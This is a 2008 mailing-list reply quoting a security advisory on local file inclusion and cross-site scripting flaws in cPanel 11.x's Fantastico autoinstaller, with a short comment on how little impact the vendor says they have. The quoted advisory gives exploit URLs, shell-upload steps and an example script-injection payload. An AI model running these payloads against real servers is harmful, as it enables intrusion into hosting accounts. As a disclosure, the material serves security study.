On Friday 31 October 2008 15:03:55 irancrash@xxxxxxxxx wrote: > ---------------------------------------------------------------- > > Script : Cpanel 11.x > > Type : Local File Inclusion & Cross Site Scripting > > Risk : High > > ---------------------------------------------------------------- > > Discovered by : Khashayar Fereidani > > **** I am 17 Years Old **** Happy birthday to you. > > My Official Website : HTTP://FEREIDANI.IR > > Team Website : Http://IRCRASH.COM > > Team Members : Khashayar Fereidani - Hadi Kiamarsi - Sina YazdanMehr > > Khashayar Fereidani Email : irancrash [ a t ] gmail [ d o t ] com > > ---------------------------------------------------------------- > > Local File Inclusion Vulnerability : > > Note : Rename your shell to config.php and upload with your ftp account in > ./ directory .... , now login in cpanel and enter vulnerable address in url > .... > > > https://ServerIp:2083/frontend/x3/fantastico/autoinstall4imagesgalleryupgra >de.php?action=GoAhead&scriptpath_show=/home/[youruser]/ > > https://ServerIp:2083/frontend/x2/fantastico/autoinstall4imagesgalleryupgra >de.php?action=GoAhead&scriptpath_show=/home/[youruser]/ > > https://ServerIp:2083/frontend/x/fantastico/autoinstall4imagesgalleryupgrad >e.php?action=GoAhead&scriptpath_show=/home/[youruser]/ According to netenberg.com there is no prospect of privilege escalation here. On their forum http://www.netenberg.com/forum/index.php?topic=6832 they say: >> I do not see any reason as to why anyone would do this as they can already >> do the same via cPanel/SSH (this exploit will only work on the cPanel >> account of the person who wishes to use it; he/she cannot affect any other >> account on the server). I guess they feel similarly about the cross-site scripting. You can start embedding those links in spam to your administrator now. > ---------------------------------------------------------------- > > Cross site scripting : > > File Address : > frontend/x3/fantastico/autoinstall4imagesgalleryupgrade.php?action=Upgrade% >20to%201.7.4 > > Set Action as Upgrade%20to%201.7.4 > > Vulnerable Variables : > > $localapp > $updatedir > $scriptpath_show > $domain_show > $thispage > $thisapp > $currentversion > > For Example : > https://ServerIp:2083/frontend/x3/fantastico/autoinstall4imagesgalleryupgra >de.php?action=Upgrade%20to%201.7.4&localapp=%22%3Cscript%3Ealert(%27xss%27)% >3C/script%3E
